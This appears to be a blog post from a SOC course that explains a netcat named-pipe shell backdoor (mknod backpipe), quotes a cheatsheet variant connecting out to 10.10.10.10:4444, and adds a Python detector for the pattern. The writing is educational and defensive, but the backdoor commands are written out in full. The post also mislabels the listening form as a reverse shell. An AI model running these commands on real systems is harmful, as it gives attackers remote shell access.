Named Pipe
During the BHIS SOC Analyst Core course I took recently, the Linux Lab had an interesting command where you create a FIFO (First In, First Out) "backpipe" with mknod (create filesystem node) and netcat, effectively creating a shell backdoor on a Linux system.
mknod backpipe p
/bin/bash 0<backpipe | nc -l 2222 1>backpipe
Basically, mknod <string> p creates a named pipe (specified by the p) called "backpipe" (though it could functionally be named anything that doesn't conflict with other things; for example, in the tcpdump Bonus Lab, one could name it timesync.svc or something similar to make it less obvious). This named pipe lets us connect one process's output to another process's input through a path on the filesystem, rather than only between two adjacent commands joined by |.
Additionally, > and < can be used to redirect a command's output and input to and from files; for example, if we ran ./FiscalReport.sh < 2024Q1.csv, the FiscalReport shell script would read its input from 2024Q1.csv.
Let's break the backpipe command down and see what's going on.
mknod backpipe p
- Creates a named pipe called "backpipe"
/bin/bash 0<backpipe
- /bin/bash reads its standard input (stdin, file descriptor 0) from the "backpipe", so the backpipe's output becomes /bin/bash's input
|
- The output from the prior command is piped into the following command
nc -l 2222 1>backpipe
- Netcat listens on port 2222, and its standard output (stdout, file descriptor 1) is sent into the named pipe "backpipe"
To summarize, this forms a loop: netcat listens for data on port 2222 and sends it into the backpipe; the backpipe delivers that data to Bash's input; and Bash's output gets piped back into netcat, which sends it over the connection.
This is a Reverse Shell, allowing an attacker to execute shell commands on a remote system.
Reverse shell cheatsheet has a similar command, which I've pasted below:
mknod backpipe p && nc 10.10.10.10 4444 0<backpipe | /bin/bash 1>backpipe
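As an added example (not from the course, the cheatsheet or the original post), here is the check a defender would run against this wiring: it flags a named FIFO that one process reads on stdin while a different process writes to it on stdout, which covers both the nc -l form above and the cheatsheet form. The fd table, PIDs, FIFO path and helper names are constructed assumptions; collect_fd_table() reads a live Linux /proc instead.

```python
import os
import stat
from collections import defaultdict
# Constructed sample of what /proc/<pid>/fd resolves to (not real output):
# (pid, comm, fd, link target, is_named_fifo)
SAMPLE_FD_TABLE = [
    (4120, "bash", 0, "/tmp/backpipe", True),   # bash 0<backpipe
    (4120, "bash", 1, "pipe:[88421]", False),   # the | into nc
    (4121, "nc", 0, "pipe:[88421]", False),
    (4121, "nc", 1, "/tmp/backpipe", True),     # nc -l 2222 1>backpipe
    (4300, "bash", 0, "/dev/pts/0", False),     # ordinary interactive shell
]
SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}
NET_TOOLS = {"nc", "ncat", "netcat", "socat"}

def find_backpipe_bridges(fd_table):
    """(fifo_path, reader (pid, comm), writer (pid, comm)) for each named FIFO one
    process reads on fd 0 while a different process writes it on fd 1."""
    readers, writers = defaultdict(list), defaultdict(list)
    for pid, comm, fd, target, is_fifo in fd_table:
        if is_fifo and fd == 0:
            readers[target].append((pid, comm))
        elif is_fifo and fd == 1:
            writers[target].append((pid, comm))
    return [(path, r, w) for path in readers.keys() & writers.keys()
            for r in readers[path] for w in writers[path] if r[0] != w[0]]

def severity(hit):
    """'high' when a shell and a network tool are the two ends of the FIFO."""
    comms = {hit[1][1], hit[2][1]}
    return "high" if comms & SHELLS and comms & NET_TOOLS else "review"

def collect_fd_table():
    """Build the same table from a live Linux /proc (root sees every user's
    processes). Anonymous pipes resolve to 'pipe:[N]' and are not named."""
    rows = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            comm = open(f"/proc/{pid}/comm").read().strip()
            fds = os.listdir(f"/proc/{pid}/fd")
        except OSError:
            continue  # process exited, or not ours to inspect
        for fd in fds:
            try:
                target = os.readlink(f"/proc/{pid}/fd/{fd}")
                named = target.startswith("/") and stat.S_ISFIFO(os.stat(target).st_mode)
            except OSError:
                continue
            rows.append((int(pid), comm, int(fd), target, named))
    return rows
```

Run find_backpipe_bridges(collect_fd_table()) periodically or from an EDR hook; a "high" hit is a shell wired to netcat through a FIFO, which has no legitimate interactive use.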
This is all pretty wild, but what else can we do with a backpipe?